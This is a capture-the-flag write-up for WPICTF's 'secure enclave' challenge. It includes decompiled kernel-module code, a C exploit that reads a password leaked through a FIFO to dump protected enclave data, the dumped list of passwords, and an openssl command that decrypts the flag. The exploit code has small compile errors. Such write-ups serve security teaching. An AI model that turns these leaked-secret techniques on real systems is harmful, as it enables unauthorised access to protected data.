Rating: 5.0

# Secure enclave challenge @WPICTF
Looking at the decompiled secure_enclave.ko, we find

```c
// read back to struct
iVar1 = enclave_read(auStack552,param_3,param_3,0);

...

ulong check_pass(void *param_1)

{
int iVar1;

iVar1 = memcmp(pass,param_1,0x20);
return (ulong)(iVar1 == 0);
}

undefined8 enclave_read(undefined4 *param_1,undefined8 param_2)

{
int iVar1;
long lVar2;
undefined4 *puVar3;
undefined4 *puVar4;
byte bVar5;

bVar5 = 0;
lVar2 = _copy_from_user(param_1,param_2,0x220);
if ((lVar2 == 0) && (iVar1 = check_pass(param_1 + 0x80), iVar1 != 0)) {
lVar2 = 0x80;
puVar3 = (undefined4 *)data;
puVar4 = param_1;
while (lVar2 != 0) {
lVar2 = lVar2 + -1;
*puVar4 = *puVar3;
puVar3 = puVar3 + (ulong)bVar5 * 0x3ffffffffffffffe + 1;
puVar4 = puVar4 + (ulong)bVar5 * 0x3ffffffffffffffe + 1;
}
lVar2 = _copy_to_user(param_2,param_1,0x220);
if (lVar2 == 0) {
return 0;
}
}
return 0xfffffff3;
```

Looking around in the file system, we find a FIFO queue called keydist, which emitts a 32-char string repeatedly (which I guess is the flaw here, it should only be passed once to the keydist process).

```bash
localhost:/tmp$ cat keydist.fifo | hexdump
0000000 d9da 5f59 754d bddd a319 9860 ede0 f500
0000010 2562 9ad0 1a71 f3b8 1255 9d6d 9cc7 5303
0000020 d9da 5f59 754d bddd a319 9860 ede0 f500
0000030 2562 9ad0 1a71 f3b8 1255 9d6d 9cc7 5303
```

Here is the include file associated with secure_enclave:

```c
#ifndef _SECURE_ENCLAVE_H
#define _SECURE_ENCLAVE_H

#include <sys/ioctl.h>

#define ENCLAVE_SIZE 512
#define PASS_SIZE 32

typedef struct
{
char data[ENCLAVE_SIZE];
char pass[PASS_SIZE];
} secure_enclave_ctx;

#define SECURE_ENCLAVE_READ _IOR('s', 1, secure_enclave_ctx*)
#define SECURE_ENCLAVE_WRITE _IOW('s', 2, secure_enclave_ctx*)
#define SECURE_ENCLAVE_CLEAR _IOR('s', 3, secure_enclave_ctx*)

#endif
```

Exploit code

```c
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/secure_enclave.h>

#define ENCLAVE_READ 0x80087301

void dump(char *buf, size_t len){

for(int i = 0; i < len; i++){
printf("%02x ", buf[i] & 0xff);
if ((i+1) % 0x20 == 0)
printf("\n");
}

printf("\n");
}

int main(){

secure_enclave_ctx c;
char pass[sizeof c.pass];
char data[sizeof c.data];

fd = open("/tmp/keydist.fifo", O_RDONLY);
read(fd, &pass, 32);
close(fd);

memset(&c, 0, sizeof c);
memcpy (&(c.pass), &pass, sizeof pass);
memcpy (&(c.data), &data, sizeof data);

if ((fd = open("/dev/secure_enclave", O_RDWR)) < 0) {
perror("open");
return -1;
}

ioctl(fd, ENCLAVE_READ, &c)

printf("key: \n");
dump(c.pass, sizeof c.pass);

printf("retval: 0x%08x\n\n", r);

printf("data: \n");
dump(c.data, sizeof c.data);

return 0;
}
```

Running the exploit:

```bash
localhost:~$ ./a.out
key:
da d9 59 5f 4d 75 dd bd 19 a3 60 98 e0 ed 00 f5 62 25 d0 9a 71 1a b8 f3 55 12 6d 9d c7 9c 03 53

data:
50 72 69 76 61 74 65 20 64 61 74 61 2c 20 70 6c 65 61 73 65 20 64 6f 6e 27 74 20 72 65 61 64 2e
0a 4b 65 79 20 6c 69 73 74 0a 32 34 33 38 32 39 34 37 33 32 39 34 32 39 38 34 33 32 39 5f 61 6a
73 64 68 66 6f 69 77 65 68 6f 69 62 65 6f 67 65 6e 76 78 7a 75 65 77 69 72 6f 77 71 72 68 77 65
72 68 20 2d 20 75 6e 75 73 65 64 0a 69 27 6d 61 62 65 74 74 65 72 68 61 63 6b 65 72 74 68 61 6e
72 65 6d 79 20 2d 20 63 74 66 20 70 61 73 73 77 6f 72 64 0a 70 6c 65 61 73 65 6d 61 6b 65 63 68
61 6c 6c 65 6e 67 65 73 66 6f 72 77 70 69 63 74 66 20 2d 20 63 74 66 20 70 61 73 73 77 6f 72 64
20 32 0a 64 74 65 72 6d 69 73 63 61 6e 63 65 6c 6c 65 64 20 2d 20 6a 75 73 74 69 6e 27 73 20 70
61 73 73 77 6f 72 64 0a 6c 69 6e 75 78 69 73 74 68 65 62 65 73 74 6f 73 5f 61 6c 6c 74 68 65 77
69 6e 64 6f 77 73 6c 6f 76 65 72 73 61 72 65 6a 75 73 74 62 61 64 61 74 70 72 6f 67 72 61 6d 6d
69 6e 67 20 2d 20 73 75 70 65 72 20 73 65 63 72 65 74 20 66 69 6c 65 20 70 61 73 73 77 6f 72 64
0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
da d9 59 5f 4d 75 dd bd 19 a3 60 98 e0 ed 00 f5 62 25 d0 9a 71 1a b8 f3 55 12 6d 9d c7 9c 03 53
6b 65 79 64 69 73 74 0a 09 20 2d 72 20 20 20 20 20 20 20 20 20 20 53 74 61 72 74 20 69 6e 20 72
65 61 64 20 6d 6f 64 65 0a 09 20 2d 77 20 20 20 20 20 20 20 20 20 20 53 74 61 72 74 20 69 6e 20
77 72 69 74 65 20 6d 6f 64 65 0a 00 00 00 00 00 2f 74 6d 70 2f 6b 65 79 64 69 73 74 2e 66 69 66
6f 00 00 00 01 1b 03 3b 40 00 00 00 07 00 00 00 4c ed ff ff 5c 00 00 00 5c ee ff ff 84 00 00 00

Private data, please don't read.
Key list
2438294732942984329_ajsdhfoiwehoibeogenvxzuewirowqrhwerh - unused
i'mabetterhackerthanremy - ctf password
pleasemakechallengesforwpictf - ctf password 2
dtermiscancelled - justin's password
linuxisthebestos_allthewindowsloversarejustbadatprogramming - super secret file password
```

What is the encryption used?

```bash
localhost:~$ cat flag.enc|hd
00000000 53 61 6c 74 65 64 5f 5f 8b d2 02 ff 25 ca d8 9a |Salted__....%...|
00000010 c7 f4 bb 0d 8f 78 b4 b5 70 c7 ea 13 c9 fb 54 e4 |.....x..p.....T.|
00000020 fe e3 ea 9c 55 1b 66 00 93 f6 a4 99 2c 17 7a 6a |....U.f.....,.zj|
00000030 0f b9 d8 f9 1a a0 08 6f f7 cd 29 54 cc 98 db 29 |.......o..)T...)|
00000040 53 f9 c9 fa 7c ce 5f e5 4e f7 9a 87 cd 38 fa c6 |S...|._.N....8..|
00000050
```

Using the password linuxisthebestos_allthewindowsloversarejustbadatprogramming to decrypt the file using OpenSSL:

```bash
localhost:~$ openssl aes-256-cbc -d -in flag.enc -out blah.txt
enter aes-256-cbc decryption password:
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
localhost:~$ cat blah.txt
Well that was fun.
WPI{@[email protected][email protected]}
```

Original writeup (https://gist.github.com/grocid/e6df8c8d466a8fc5396e56c0b0234ba3).
lior5654April 22, 2020, 6:55 p.m.

You should add an explanation about where that address in #define ENCLAVE_READ 0x80087301 is from :). Nice exploit code!